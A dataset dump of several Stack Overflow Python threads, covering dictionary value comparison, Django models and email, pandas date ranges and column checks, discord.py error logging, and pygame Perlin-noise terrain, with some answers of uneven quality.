content
stringlengths
85
101k
title
stringlengths
0
150
question
stringlengths
15
48k
answers
list
answers_scores
list
non_answers
list
non_answers_scores
list
tags
list
name
stringlengths
35
137
Q: how to compare values of two dictionaries with list comprohension? How to compare only the values of two dictonaries? So I have this: dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3962.00, "waspeen": 3304.08} def compare_value_dict(dic): return dic def compare_value_dict2(dic2): return dic2 def compare_dic(dic1, dic2): if dic1 == dic2: print('the same dictionary') else: print('difference dictionary') compare_dic(compare_value_dict(dict1).values(), compare_value_dict2(dic2.values())) but I get the print statement: print('difference dictionary') But the values are the same. And can this be shorter with list comprohension? this works: compare_dic(compare_value_dict(dict1).keys(), compare_value_dict2(dic2.keys())) if I change only the key then it outputs the difference. But with values. it doesn't work. if the values are the same, but the keys are different, that it returns difference. But it has to be of course not difference A: You can't use == on the dict.values() dictionary view objects, as that specific type doesn't act like a set. Instead values_view_foo == values_view_bar is only ever true if both refer to the same dictionary view object. The contents don't matter. It'll depend entirely on the types of values that the dictionary contains on what techniques can be used here. The following options will cover many different types of values, but not all. It is not really possible to make a generic one-size-fits-all comparison function for all possible types of values in a dictionary. In this specific case, you can turn your values views into sets, because the values happen to both be unique and hashable: def compare_dict_values(dv1, dv2): """Compare two dictionary values views Values are assumed to be unique and hashable """ return set(dv1) == set(dv2) Where the values are not unique, and / or not hashable, you'll have to find another way to compare the values. If they are, say, sortable (orderable), then you could compare them by first sorting the values: def compare_dict_values(dv1, dv2): """Compare two dictionary value views Values are assumed to be orderable, but do not need to be unique or hashable. """ return len(dv1) == len(dv2) and sorted(dv1) == sorted(dv2) By sorting you remove the issue with the values view being unordered. The len() check is there because it is much cheaper than sorting and so let’s you avoid the sort when it is not necessary. If the values are hashable but not unique (and so the values collection ('foo', 'bar', 'foo') is different from ('foo', 'bar', 'bar')), you can use Counter() objects to capture both the values and their counts: from collections import Counter def compare_dict_values(dv1, dv2): """Compare two dictionary value views Values are assumed to be hashable, but do not need to be unique. """ return Counter(dv1) == Counter(dv2) Note: Each of these techniques assume that the individual values in the dictionary support equality testing and you only need them to be exactly equal. For floating point values, you can run into issues where the values are almost equal, but not exactly equal. If your values need to be close and not just exactly equal, you can use the math.isclose() function on each pair of values. Use zip(sorted(dv1), sorted(dv2)) to pair up the values: def float_dict_values_close(dv1, dv2, **kwargs): """Compare two dictionary view objects with floats Returns true if the values in both dictionary views are *close* in value. """ if len(dv1) != len(dv2): return False v1, v2 = sorted(dv1), sorted(dv2) return all(is_close(*vs, **kwargs) for vs in zip(v1, v2)) Things get more complicated if your values can be different types; you generally can't sort a dictionary values view with a mix of different types in it. If you have a mix of types where not all the types are hashable, you'd have to separate out the different types first and then use a mixture of techniques to compare the values of the same type. This gets complicated when you have a hierarchy of types where subclasses can be compared with superclasses, etc. I'm declaring that as outside the scope of this answer. A: so you wanna check if your dictionaries are same with their values right? dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3304.08, "waspeen": 3962.00} def comparision(*dicts): instanceToCompare , values = len(dicts[0].values()) , set() for d in dicts: for value in d.values(): values.add(value) return True if len(values) == instanceToCompare else False print('all dictionaries has same values') if comparision(dict1 , dic2) else print('input dictionaries are not same at all') you'll know if all values in dictionaries are same or not , regardless to their order or repitation
how to compare values of two dictionaries with list comprohension?
How to compare only the values of two dictonaries? So I have this: dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3962.00, "waspeen": 3304.08} def compare_value_dict(dic): return dic def compare_value_dict2(dic2): return dic2 def compare_dic(dic1, dic2): if dic1 == dic2: print('the same dictionary') else: print('difference dictionary') compare_dic(compare_value_dict(dict1).values(), compare_value_dict2(dic2.values())) but I get the print statement: print('difference dictionary') But the values are the same. And can this be shorter with list comprohension? this works: compare_dic(compare_value_dict(dict1).keys(), compare_value_dict2(dic2.keys())) if I change only the key then it outputs the difference. But with values. it doesn't work. if the values are the same, but the keys are different, that it returns difference. But it has to be of course not difference
[ "You can't use == on the dict.values() dictionary view objects, as that specific type doesn't act like a set. Instead values_view_foo == values_view_bar is only ever true if both refer to the same dictionary view object. The contents don't matter.\nIt'll depend entirely on the types of values that the dictionary contains on what techniques can be used here. The following options will cover many different types of values, but not all. It is not really possible to make a generic one-size-fits-all comparison function for all possible types of values in a dictionary.\nIn this specific case, you can turn your values views into sets, because the values happen to both be unique and hashable:\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary values views\n\n Values are assumed to be unique and hashable\n\n \"\"\"\n return set(dv1) == set(dv2)\n\nWhere the values are not unique, and / or not hashable, you'll have to find another way to compare the values.\nIf they are, say, sortable (orderable), then you could compare them by first sorting the values:\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary value views\n\n Values are assumed to be orderable, but do not need to be unique\n or hashable.\n\n \"\"\"\n return len(dv1) == len(dv2) and sorted(dv1) == sorted(dv2)\n\nBy sorting you remove the issue with the values view being unordered. The len() check is there because it is much cheaper than sorting and so let’s you avoid the sort when it is not necessary.\nIf the values are hashable but not unique (and so the values collection ('foo', 'bar', 'foo') is different from ('foo', 'bar', 'bar')), you can use Counter() objects to capture both the values and their counts:\nfrom collections import Counter\n\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary value views\n\n Values are assumed to be hashable, but do not need to be unique.\n\n \"\"\"\n return Counter(dv1) == Counter(dv2)\n\nNote: Each of these techniques assume that the individual values in the dictionary support equality testing and you only need them to be exactly equal. For floating point values, you can run into issues where the values are almost equal, but not exactly equal. If your values need to be close and not just exactly equal, you can use the math.isclose() function on each pair of values. Use zip(sorted(dv1), sorted(dv2)) to pair up the values:\ndef float_dict_values_close(dv1, dv2, **kwargs):\n \"\"\"Compare two dictionary view objects with floats\n\n Returns true if the values in both dictionary views are\n *close* in value.\n\n \"\"\"\n if len(dv1) != len(dv2):\n return False\n v1, v2 = sorted(dv1), sorted(dv2)\n return all(is_close(*vs, **kwargs) for vs in zip(v1, v2))\n\nThings get more complicated if your values can be different types; you generally can't sort a dictionary values view with a mix of different types in it. If you have a mix of types where not all the types are hashable, you'd have to separate out the different types first and then use a mixture of techniques to compare the values of the same type. This gets complicated when you have a hierarchy of types where subclasses can be compared with superclasses, etc. I'm declaring that as outside the scope of this answer.\n", "so you wanna check if your dictionaries are same with their values right?\ndict1 = {\"appe\": 3962.00, \"waspeen\": 3304.08}\ndic2 = {\"appel\": 3304.08, \"waspeen\": 3962.00}\ndef comparision(*dicts):\n instanceToCompare , values = len(dicts[0].values()) , set()\n for d in dicts:\n for value in d.values():\n values.add(value)\n return True if len(values) == instanceToCompare else False\nprint('all dictionaries has same values') if comparision(dict1 , dic2) else \nprint('input dictionaries are not same at all')\n\nyou'll know if all values in dictionaries are same or not , regardless to their order or repitation\n" ]
[ 5, 0 ]
[ "you can go with the function dic.keys() that returns a vector containing all \"headers\" from your dictionary. And in the for loop, you can compare.\n" ]
[ -1 ]
[ "dictionary", "dictview", "python" ]
stackoverflow_0074591555_dictionary_dictview_python.txt
Q: how add custom fild to all objects of django model i have db where is companies and custom users, i want add custom field for different companies. Example: user have only NAME, if company is "EXAMPLE": user have fields only NAME and AGE, elif "VIN": user have only NAME and SIZE and AGE and WORK, else: only name. How add this custom fields and update it. Thanks, sory for my English)) Company 1: name "+add field" company2: -name -age "+add field" company 3: -name -age -size "+add field" I try many to many, many to one, simple fields, dont work how i want. I wand many custom field how i can edit for every user A: you must have separated models that refers OneToOne key to user model like this: class Example(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, ) name = models.CharField(max_length=30) age= models.IntegerField() class Vin(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, ) name = models.CharField(max_length=30) age= models.IntegerField() size= models.IntegerField() work= models.CharField(max_length=30)
how add custom fild to all objects of django model
i have db where is companies and custom users, i want add custom field for different companies. Example: user have only NAME, if company is "EXAMPLE": user have fields only NAME and AGE, elif "VIN": user have only NAME and SIZE and AGE and WORK, else: only name. How add this custom fields and update it. Thanks, sory for my English)) Company 1: name "+add field" company2: -name -age "+add field" company 3: -name -age -size "+add field" I try many to many, many to one, simple fields, dont work how i want. I wand many custom field how i can edit for every user
[ "you must have separated models that refers OneToOne key to user model like this:\nclass Example(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, )\n name = models.CharField(max_length=30)\n age= models.IntegerField()\n\nclass Vin(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, )\n name = models.CharField(max_length=30)\n age= models.IntegerField()\n size= models.IntegerField()\n work= models.CharField(max_length=30)\n\n" ]
[ 0 ]
[]
[]
[ "django", "django_models", "django_views", "python" ]
stackoverflow_0074591721_django_django_models_django_views_python.txt
Q: How Can we Loop Through a Range of Rolling Dates? I did some Googling and figured out how to generate all Friday dates in a year. # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) for d in allfridays(2022): print(d) Result: 2022-01-07 2022-01-14 2022-01-21 etc. 2022-12-16 2022-12-23 2022-12-30 Now, I'm trying to figure out how to loop through a range of rolling dates, so like 2022-01-07 + 60 days, then 2022-01-14 + 60 days, then 2022-01-21 + 60 days. step #1: start = '2022-01-07' end = '2022-03-08' step #2: start = '2022-01-14' end = '2022-03-15' Ideally, I want to pass in the start and end date loop, into another loop, which looks like this... price_data = [] for ticker in tickers: try: prices = wb.DataReader(ticker, start = start.strftime('%m/%d/%Y'), end = end.strftime('%m/%d/%Y'), data_source='yahoo')[['Adj Close']] price_data.append(prices.assign(ticker=ticker)[['ticker', 'Adj Close']]) except: print(ticker) df = pd.concat(price_data) A: First, we have to figure out how to get the first Friday of a given year. Next, we will calculate the start, end days. import datetime FRIDAY = 4 # Based on Monday=0 WEEK = datetime.timedelta(days=7) def first_friday(year): """Return the first Friday of the year.""" the_date = datetime.date(year, 1, 1) while the_date.weekday() != FRIDAY: the_date = the_date + datetime.timedelta(days=1) return the_date def friday_ranges(year, days_count): """ Generate date ranges that starts on first Friday of `year` and lasts for `days_count`. """ DURATION = datetime.timedelta(days=days_count) start_date = first_friday(year) end_date = start_date + DURATION while end_date.year == year: yield start_date, end_date start_date += WEEK end_date = start_date + DURATION for start_date, end_date in friday_ranges(year=2022, days_count=60): # Do what you want with start_date and end_date print((start_date, end_date)) Sample output: (datetime.date(2022, 1, 7), datetime.date(2022, 3, 8)) (datetime.date(2022, 1, 14), datetime.date(2022, 3, 15)) (datetime.date(2022, 1, 21), datetime.date(2022, 3, 22)) ... (datetime.date(2022, 10, 21), datetime.date(2022, 12, 20)) (datetime.date(2022, 10, 28), datetime.date(2022, 12, 27)) Notes The algorithm for first Friday is simple: Start with Jan 1, then keep advancing the day until Friday I made an assumption that the end date must fall into the specified year. If that is not the case, you can adjust the condition in the while loop A: as you use pandas then you can try to do it this way: import pandas as pd year = 2022 dates = pd.date_range(start=f'{year}-01-01',end=f'{year}-12-31',freq='W-FRI') df = pd.DataFrame({'my_dates':dates, 'sixty_ahead':dates + pd.Timedelta(days=60)}) print(df.head()) ''' my_dates sixty_ahead 0 2022-01-07 2022-03-08 1 2022-01-14 2022-03-15 2 2022-01-21 2022-03-22 3 2022-01-28 2022-03-29 4 2022-02-04 2022-04-05 A: This could work maybe. You can add the condition, the end of the loop within the lambda function. from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) list_dates = [] for d in allfridays(2022): list_dates.append(d) add_days = map(lambda x: x+timedelta(days = 60),list_dates) print(list(add_days)) A: Oh my, I totally missed this before. The solution below works just fine. import pandas as pd # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) lst=[] for d in allfridays(2022): lst.append(d) df = pd.DataFrame(lst) print(type(df)) df.columns = ['my_dates'] df['sixty_ahead'] = df['my_dates'] + timedelta(days=60) df Result: my_dates sixty_ahead 0 2022-01-07 2022-03-08 1 2022-01-14 2022-03-15 2 2022-01-21 2022-03-22 etc. 49 2022-12-16 2023-02-14 50 2022-12-23 2023-02-21 51 2022-12-30 2023-02-28
How Can we Loop Through a Range of Rolling Dates?
I did some Googling and figured out how to generate all Friday dates in a year. # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) for d in allfridays(2022): print(d) Result: 2022-01-07 2022-01-14 2022-01-21 etc. 2022-12-16 2022-12-23 2022-12-30 Now, I'm trying to figure out how to loop through a range of rolling dates, so like 2022-01-07 + 60 days, then 2022-01-14 + 60 days, then 2022-01-21 + 60 days. step #1: start = '2022-01-07' end = '2022-03-08' step #2: start = '2022-01-14' end = '2022-03-15' Ideally, I want to pass in the start and end date loop, into another loop, which looks like this... price_data = [] for ticker in tickers: try: prices = wb.DataReader(ticker, start = start.strftime('%m/%d/%Y'), end = end.strftime('%m/%d/%Y'), data_source='yahoo')[['Adj Close']] price_data.append(prices.assign(ticker=ticker)[['ticker', 'Adj Close']]) except: print(ticker) df = pd.concat(price_data)
[ "First, we have to figure out how to get the first Friday of a given year. Next, we will calculate the start, end days.\nimport datetime\n\nFRIDAY = 4 # Based on Monday=0\nWEEK = datetime.timedelta(days=7)\n\n\ndef first_friday(year):\n \"\"\"Return the first Friday of the year.\"\"\"\n the_date = datetime.date(year, 1, 1)\n while the_date.weekday() != FRIDAY:\n the_date = the_date + datetime.timedelta(days=1)\n return the_date\n\n\ndef friday_ranges(year, days_count):\n \"\"\"\n Generate date ranges that starts on first Friday of `year` and\n lasts for `days_count`.\n \"\"\"\n DURATION = datetime.timedelta(days=days_count)\n\n start_date = first_friday(year)\n end_date = start_date + DURATION\n\n while end_date.year == year:\n yield start_date, end_date\n start_date += WEEK\n end_date = start_date + DURATION\n\n\nfor start_date, end_date in friday_ranges(year=2022, days_count=60):\n # Do what you want with start_date and end_date\n print((start_date, end_date))\n\nSample output:\n(datetime.date(2022, 1, 7), datetime.date(2022, 3, 8))\n(datetime.date(2022, 1, 14), datetime.date(2022, 3, 15))\n(datetime.date(2022, 1, 21), datetime.date(2022, 3, 22))\n...\n(datetime.date(2022, 10, 21), datetime.date(2022, 12, 20))\n(datetime.date(2022, 10, 28), datetime.date(2022, 12, 27))\n\nNotes\n\nThe algorithm for first Friday is simple: Start with Jan 1, then keep advancing the day until Friday\nI made an assumption that the end date must fall into the specified year. If that is not the case, you can adjust the condition in the while loop\n\n", "as you use pandas then you can try to do it this way:\nimport pandas as pd\n\nyear = 2022\ndates = pd.date_range(start=f'{year}-01-01',end=f'{year}-12-31',freq='W-FRI')\ndf = pd.DataFrame({'my_dates':dates, 'sixty_ahead':dates + pd.Timedelta(days=60)})\n\nprint(df.head())\n'''\n my_dates sixty_ahead\n0 2022-01-07 2022-03-08\n1 2022-01-14 2022-03-15\n2 2022-01-21 2022-03-22\n3 2022-01-28 2022-03-29\n4 2022-02-04 2022-04-05\n\n", "This could work maybe. You can add the condition, the end of the loop within the lambda function.\nfrom datetime import date, timedelta\n def allfridays(year):\n d = date(year, 1, 1) # January 1st \n d += timedelta(days = 8 - 2) # Friday \n while d.year == year:\n yield d\n d += timedelta(days = 7) \n list_dates = []\n for d in allfridays(2022):\n list_dates.append(d)\n \n\n add_days = map(lambda x: x+timedelta(days = 60),list_dates)\n print(list(add_days))\n\n", "Oh my, I totally missed this before. The solution below works just fine.\nimport pandas as pd\n# get all Fridays in a year\nfrom datetime import date, timedelta\ndef allfridays(year):\n d = date(year, 1, 1) # January 1st \n d += timedelta(days = 8 - 2) # Friday \n while d.year == year:\n yield d\n d += timedelta(days = 7)\n\nlst=[]\nfor d in allfridays(2022):\n lst.append(d)\n \ndf = pd.DataFrame(lst)\nprint(type(df))\ndf.columns = ['my_dates']\n\n\ndf['sixty_ahead'] = df['my_dates'] + timedelta(days=60)\ndf \n\nResult:\n my_dates sixty_ahead\n0 2022-01-07 2022-03-08\n1 2022-01-14 2022-03-15\n2 2022-01-21 2022-03-22\netc.\n49 2022-12-16 2023-02-14\n50 2022-12-23 2023-02-21\n51 2022-12-30 2023-02-28\n\n" ]
[ 1, 1, 0, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074586200_python_python_3.x.txt
Q: write('\n') command does not deposit new line I am working on a convertor file in colab python. When creating the txt file on specific places I need it to write down the 0 and change line, although it does not. Please help, here is my code: f=open('dimac_outfs1.txt') with open('dimac_outfs1.txt','a') as writefile: for i in range(len(my_array)): if my_array[i]!=0: writefile.write(str(my_array[i])) else: writefile.write(str(str(my_array[i] + '\n')) even trying else: writefile.write(str(my_array[i])) writefile.write("\n") does not help. my_array is an numpy.ndarray witch consists of: array(['-1', ' ', '-2', ..., ' ', '0', ' '], dtype='<U21') it has possitive and negative integers as well as zero and spaces. A: If I understand this correctly, you command does not work. I think if you check the debugger you will notice that there is an EOL error in : else: writefile.write(str(str(my_array[i] + '\n')) You are missing a parenthesis. Otherwise, the with open(<file>,'a') as f: f.write(str(i)+'\n') works so I guess the EOL error should be the one. Also tips that lazy me loves : I can recommand you to put a '\n' at the beginning of your code if you append to file. Make sure you are in the right path, and if needed, put the absolute path of the file you append to. Python being very good to simplify everything, you can also use your for loop this way : for elem in list : elem will at each loop be list[0], list[1] etc. Hoping I answered your question
write('\n') command does not deposit new line
I am working on a convertor file in colab python. When creating the txt file on specific places I need it to write down the 0 and change line, although it does not. Please help, here is my code: f=open('dimac_outfs1.txt') with open('dimac_outfs1.txt','a') as writefile: for i in range(len(my_array)): if my_array[i]!=0: writefile.write(str(my_array[i])) else: writefile.write(str(str(my_array[i] + '\n')) even trying else: writefile.write(str(my_array[i])) writefile.write("\n") does not help. my_array is an numpy.ndarray witch consists of: array(['-1', ' ', '-2', ..., ' ', '0', ' '], dtype='<U21') it has possitive and negative integers as well as zero and spaces.
[ "If I understand this correctly, you command does not work.\nI think if you check the debugger you will notice that there is an EOL error in :\n else:\n writefile.write(str(str(my_array[i] + '\\n')) \n\nYou are missing a parenthesis.\nOtherwise, the\nwith open(<file>,'a') as f:\nf.write(str(i)+'\\n')\n\nworks so I guess the EOL error should be the one.\nAlso tips that lazy me loves :\nI can recommand you to put a '\\n' at the beginning of your code if you append to file.\nMake sure you are in the right path, and if needed, put the absolute path of the file you append to.\nPython being very good to simplify everything, you can also use your for loop this way :\nfor elem in list :\n\nelem will at each loop be list[0], list[1] etc.\nHoping I answered your question \n" ]
[ 1 ]
[]
[]
[ "arrays", "file", "python" ]
stackoverflow_0074591656_arrays_file_python.txt
Q: Django mail_admins not sending an email i have tried using send_mail and it work properly (its html showing value '1') but When i access localhost:8000/emailAdmins , its showing a 'none' word in html, please help me why my mail_admins doesn't work My setting EMAIL_HOST='smtp.gmail.com' EMAIL_HOST_USER='myemail@gmail.com' EMAIL_HOST_PASSWORD='password' EMAIL_PORT=587 EMAIL_USE_TLS=True ADMINS = [ ('myname' , 'myemail@gmail.com'), ] My url from django.conf.urls import url from app1 import views as myapp urlpatterns = [ url(r'^emailAdmins/',myapp.sendAdminsEmail,name='emailAdmins'), ] My view from django.http import HttpResponse from django.core.mail import mail_admins def sendAdminsEmail(request): res = mail_admins('my subject', 'site is going down',) return HttpResponse('%s' %res) A: Add this line with your email configuration it worked for me EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
Django mail_admins not sending an email
i have tried using send_mail and it work properly (its html showing value '1') but When i access localhost:8000/emailAdmins , its showing a 'none' word in html, please help me why my mail_admins doesn't work My setting EMAIL_HOST='smtp.gmail.com' EMAIL_HOST_USER='myemail@gmail.com' EMAIL_HOST_PASSWORD='password' EMAIL_PORT=587 EMAIL_USE_TLS=True ADMINS = [ ('myname' , 'myemail@gmail.com'), ] My url from django.conf.urls import url from app1 import views as myapp urlpatterns = [ url(r'^emailAdmins/',myapp.sendAdminsEmail,name='emailAdmins'), ] My view from django.http import HttpResponse from django.core.mail import mail_admins def sendAdminsEmail(request): res = mail_admins('my subject', 'site is going down',) return HttpResponse('%s' %res)
[ "Add this line with your email configuration it worked for me\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\n" ]
[ 0 ]
[]
[]
[ "django", "python" ]
stackoverflow_0055015391_django_python.txt
Q: how to compare variable in different columns pandas I want to compare three variable in three dataframe columns. but it gave me an error TypeError: unhashable type: 'Series'. below is my code import pandas as pd df = pd.DataFrame(columns=['Entry','Middle','Exit']) entry_value = '17.98' middle_value = '12.16' exit_value = '1.2' df = df.append({'Entry' : entry_value , 'Middle' : middle_value, 'Exit' : exit_value}, ignore_index = True) entry_value = '19.98' middle_value = '192.16' exit_value = '1.1' if entry_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('entry') elif middle_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('middle') elif exit_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('exit') else: print('wawo')` A: You can search for a column but if you want to search for multiple columns you must either convert them to a single list or define them as a single series. if entry_value in df[['Entry','Middle','Exit']].stack().to_list(): print('entry') elif middle_value in df[['Entry','Middle','Exit']].stack().to_list(): print('middle') elif exit_value in df[['Entry','Middle','Exit']].stack().to_list(): print('exit') else: print('wawo') If you are searching all columns, you do not need to define individual column names: #dont use #df[['Entry','Middle','Exit']].stack() #use #df.stack() if entry_value in df.stack().to_list(): print('entry') elif middle_value in df.stack().to_list(): print('middle') elif exit_value in df.stack().to_list(): print('exit') else: print('wawo') A: I suggest you to use pandas.DataFrame.isin to check if any of the columns selected contain a certain value. Try this : cols= ['Entry', 'Middle', 'Exit'] if any(df[cols].isin([entry_value])): print('entry') elif any(df[cols].isin([middle_value])): print('middle') elif any(df[cols].isin([exit_value])): print('exit') else: print('wawo') NB: Not sure why you're assigning different values to the same variables when constructing your datarame but you should know that pandas.DataFrame.append is deprecated. FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
how to compare variable in different columns pandas
I want to compare three variable in three dataframe columns. but it gave me an error TypeError: unhashable type: 'Series'. below is my code import pandas as pd df = pd.DataFrame(columns=['Entry','Middle','Exit']) entry_value = '17.98' middle_value = '12.16' exit_value = '1.2' df = df.append({'Entry' : entry_value , 'Middle' : middle_value, 'Exit' : exit_value}, ignore_index = True) entry_value = '19.98' middle_value = '192.16' exit_value = '1.1' if entry_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('entry') elif middle_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('middle') elif exit_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('exit') else: print('wawo')`
[ "You can search for a column but if you want to search for multiple columns you must either convert them to a single list or define them as a single series.\nif entry_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('entry')\nelif middle_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('middle')\nelif exit_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('exit')\nelse:\n print('wawo')\n\nIf you are searching all columns, you do not need to define individual column names:\n#dont use\n#df[['Entry','Middle','Exit']].stack()\n\n#use\n#df.stack()\nif entry_value in df.stack().to_list():\n print('entry')\nelif middle_value in df.stack().to_list():\n print('middle')\nelif exit_value in df.stack().to_list():\n print('exit')\nelse:\n print('wawo')\n\n", "I suggest you to use pandas.DataFrame.isin to check if any of the columns selected contain a certain value.\nTry this :\ncols= ['Entry', 'Middle', 'Exit']\n\nif any(df[cols].isin([entry_value])):\n print('entry')\nelif any(df[cols].isin([middle_value])):\n print('middle')\nelif any(df[cols].isin([exit_value])):\n print('exit')\nelse:\n print('wawo')\n\nNB: Not sure why you're assigning different values to the same variables when constructing your datarame but you should know that pandas.DataFrame.append is deprecated.\n\nFutureWarning: The frame.append method is deprecated and will be\nremoved from pandas in a future version. Use pandas.concat instead.\n\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074591879_dataframe_pandas_python.txt
Q: Runtime error not showing when using asyncio to run discord bot I'm developing discord bot with discord.py==2.1.0. I use cog to write the main function that I wanna use, but I found when the whole bot is wrapped in async function and called by asyncio.run(), my terminal won't show any error message when there is any runtime error in my cog script. Here is the example application. I stored my bot token in environment variable. bot.py import os import discord from discord.ext import commands import asyncio token = os.environ["BOT_TOKEN"] class Bot(commands.Bot): def __init__(self): intents = discord.Intents.default() intents.members = True intents.message_content = True description = "bot example." super().__init__( command_prefix=commands.when_mentioned_or('!'), intents=intents, description=description ) async def on_ready(self): print(f'Logged in as {self.user} (ID: {self.user.id})') print('------') bot = Bot() async def load_extensions(): for f in os.listdir("./cogs"): if f.endswith(".py"): await bot.load_extension("cogs." + f[:-3]) async def main(): async with bot: await load_extensions() await bot.start(token) asyncio.run(main()) ./cogs/my_cog.py from discord.ext import commands class Test(commands.Cog): def __init__(self, client): self.client = client @commands.Cog.listener() async def on_ready(self): print("Ready") @commands.command() async def command(self, ctx): test_error_message() # An runtime error example print("Command") async def setup(client): await client.add_cog(Test(client)) Command that I run in terminal to start the bot. python bot.py When I type !command in the discord channel, there is no error message showing in the terminal, but there is no "Command" printed out so I'm sure the code stopped at the line I called test_error_message() I expected that it should show error message normally, but I cannot find useful reference to make it work :( There is one reason I need to use asyncio, I have a task loop to run in the bot, like the code below. from discord.ext import tasks @tasks.loop(seconds=10) async def avatar_update(): # code here async def main(): async with bot: avatar_update.start() await load_extensions() await bot.start(token) I would happy to know if there are some great practice to handle error in this situation. Thanks! A: Client.start() doesn't configure logging, so if you want to use that then you have to do it yourself (there's setup_logging to add a basic config). run() configures logging for you. For more info, read the docs. https://discordpy.readthedocs.io/en/stable/logging.html?highlight=logging
Runtime error not showing when using asyncio to run discord bot
I'm developing discord bot with discord.py==2.1.0. I use cog to write the main function that I wanna use, but I found when the whole bot is wrapped in async function and called by asyncio.run(), my terminal won't show any error message when there is any runtime error in my cog script. Here is the example application. I stored my bot token in environment variable. bot.py import os import discord from discord.ext import commands import asyncio token = os.environ["BOT_TOKEN"] class Bot(commands.Bot): def __init__(self): intents = discord.Intents.default() intents.members = True intents.message_content = True description = "bot example." super().__init__( command_prefix=commands.when_mentioned_or('!'), intents=intents, description=description ) async def on_ready(self): print(f'Logged in as {self.user} (ID: {self.user.id})') print('------') bot = Bot() async def load_extensions(): for f in os.listdir("./cogs"): if f.endswith(".py"): await bot.load_extension("cogs." + f[:-3]) async def main(): async with bot: await load_extensions() await bot.start(token) asyncio.run(main()) ./cogs/my_cog.py from discord.ext import commands class Test(commands.Cog): def __init__(self, client): self.client = client @commands.Cog.listener() async def on_ready(self): print("Ready") @commands.command() async def command(self, ctx): test_error_message() # An runtime error example print("Command") async def setup(client): await client.add_cog(Test(client)) Command that I run in terminal to start the bot. python bot.py When I type !command in the discord channel, there is no error message showing in the terminal, but there is no "Command" printed out so I'm sure the code stopped at the line I called test_error_message() I expected that it should show error message normally, but I cannot find useful reference to make it work :( There is one reason I need to use asyncio, I have a task loop to run in the bot, like the code below. from discord.ext import tasks @tasks.loop(seconds=10) async def avatar_update(): # code here async def main(): async with bot: avatar_update.start() await load_extensions() await bot.start(token) I would happy to know if there are some great practice to handle error in this situation. Thanks!
[ "Client.start() doesn't configure logging, so if you want to use that then you have to do it yourself (there's setup_logging to add a basic config). run() configures logging for you.\nFor more info, read the docs. https://discordpy.readthedocs.io/en/stable/logging.html?highlight=logging\n" ]
[ 0 ]
[]
[]
[ "discord", "discord.py", "python" ]
stackoverflow_0074591873_discord_discord.py_python.txt
Q: How to generate perlin noise in pygame? I am trying to make a survival game and I have a problem with perlin noise. My program gives me this: But I want something like islands or rivers. Here's my code: #SetUp# import pygame, sys, random pygame.init() win = pygame.display.set_mode((800, 600)) pygame.display.set_caption('Isom') x = 0 y = 0 s = 0 tilel = list() random.seed(5843) MAP = [random.randint(0, 1) for _ in range(192)] #Tiles# class tile(): grass = pygame.image.load('Sprites/Images/Grass.png') water = pygame.image.load('Sprites/Images/Water.png') #Loop# while True: for key in pygame.event.get(): if key.type == pygame.QUIT: pygame.quit() sys.exit() #World# for a in range(12): for b in range(16): if MAP[s] == 0: win.blit((tile.grass), (x, y)) elif MAP[s] == 1: win.blit((tile.water), (x, y)) x += 50 s += 1 x = 0 y += 50 x = 0 y = 0 s = 0 #Update# pygame.display.update() A: image of randomly genrated terrain code for perlin noise in pygame: from PIL import Image import numpy as np from perlin_noise import PerlinNoise import random import pygame pygame.init() noise = PerlinNoise(octaves=6, seed=random.randint(0, 100000)) xpix, ypix = 500, 500 pic = [[noise([i/xpix, j/ypix]) for j in range(xpix)] for i in range(ypix)] screen = pygame.display.set_mode ((500, 500), pygame.RESIZABLE) while True: for event in pygame.event.get(): if event.type == pygame.QUIT: pygame.quit() run = False for i, row in enumerate(pic): for j, column in enumerate(row): if column>=0.6: pygame.draw.rect(screen, (250, 250, 250), pygame.Rect(j, i, 1, 1)) elif column>=0.2: pygame.draw.rect(screen, (80, 80, 80), pygame.Rect(j, i, 1, 1)) elif column>=0.09: pygame.draw.rect(screen, (30, 90, 30), pygame.Rect(j, i, 1, 1)) elif column >=0.009: pygame.draw.rect(screen, (10, 100, 10), pygame.Rect(j, i, 1, 1)) elif column >=0.002: pygame.draw.rect(screen, (100, 150, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.06: pygame.draw.rect(screen, (30, 190, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.02: pygame.draw.rect(screen, (40, 200, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.1: pygame.draw.rect(screen, (10, 210, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.8: pygame.draw.rect(screen, (0, 0, 200), pygame.Rect(j, i, 1, 1)) #------------ 